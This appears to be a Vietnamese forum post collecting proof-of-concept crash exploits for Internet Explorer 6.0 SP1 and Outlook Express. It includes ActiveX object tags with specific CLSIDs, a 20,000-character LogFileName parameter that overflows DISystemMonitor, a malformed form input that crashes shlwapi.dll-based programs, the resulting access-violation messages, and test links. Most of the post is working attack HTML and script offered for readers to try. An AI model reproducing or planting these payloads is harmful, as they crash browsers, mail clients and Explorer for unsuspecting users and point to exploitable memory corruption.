Lỗi mới của Internet Explorer, Ai dùng version 6.0 SP1 thì vào test
trang này đã được đọc lầnLỖI THỨ 1:
Test ở 6.0 SP1, patched
<object
id=crash
classid="clsid:00022613-0000-0000-C000-000000000046"
width=1
height=1
>
</object>
Nếu paste đoạn code trong thẻ object mà bạn đã chỉ định vào một rich text html email, MSIMN sẽ crash:
<>
id=crash
classid="clsid:00022613-0000-0000-C000-000000000046"
width=1
height=1
<>
Outlook Express 6 [6.00.2800.1106] sẽ crash với error sau:
--------
MSIMN.exe - Application Error
The instruction at "0x000b01b8" referenced memory at "0x39f1be78". The
memory could not be "read".
---------
Link để test: http://vnsecurity.com/crashIE1.htm
LỖI THỨ 2:
Tested ở 6.0 SP1, bản patch hoàn toàn
<script language="javascript">
function crash() {
v.innerHTML='<object classid=\"clsid:0CF32AA1-7571-11D0-93C4-00AA00A3DDEA\">Oops!</object>';
}
</script>
Link để test: http://vnsecurity.com/crashIE2.htm
Lỗi thêm:
<HTML>
<BODY>
<OBJECT ID="DISystemMonitor1" WIDTH="100%" HEIGHT="100%"
CLASSID="CLSID:C4D2D8E0-D1DD-11CE-940F-008029004347">
<PARAM NAME="LogFileName" VALUE="aaaaaaaaaa[20000 'a']"
</OBJECT>
</BODY>
</HTML>
Nếu một user truy cập vào trang web có đoạn code trên, IE, Outlook và Outlook Express sẽ crash với error sau:
"Application popup: iexplore.exe - Application Error : The instruction at "0x64a8e132" referenced memory at "0x006100dd". The memory could not be "written".
Ví dụ online là:
http://www.ussrback.com/microsoft/msmactivex.html
http://www.ussrback.com/microsoft/msmactivex2.html
IE và Outlook có thêm lỗi là:
<html>
<form>
<input type crash>
</form>
</html>
Nó sẽ crash IE với error sau:
Unhandled exception in iexplore.exe (SHLWAPI.DLL): 0xC0000005: Access Violation
Mã này cũng crash Outlook, Frontpage, và tất cả chương trình của Microsoft mà có dùng thư viện shlwapi.dll để đáp trả đoạn mã của web.
Nó cũng có thể crash explorer.exe khi file .html có chứa code đó được copy vào bất kỳ folder nào!!
LỖI TIẾP THEO
Test ở : IE 6.0 SP1
Mô tả:
Lỗi do click và 1 link đặc biệt. Bạn có thể test bằng cách click vào link ở trang này
http://usuarios.lycos.es/actualidad21/ie_URL_behaviour.html
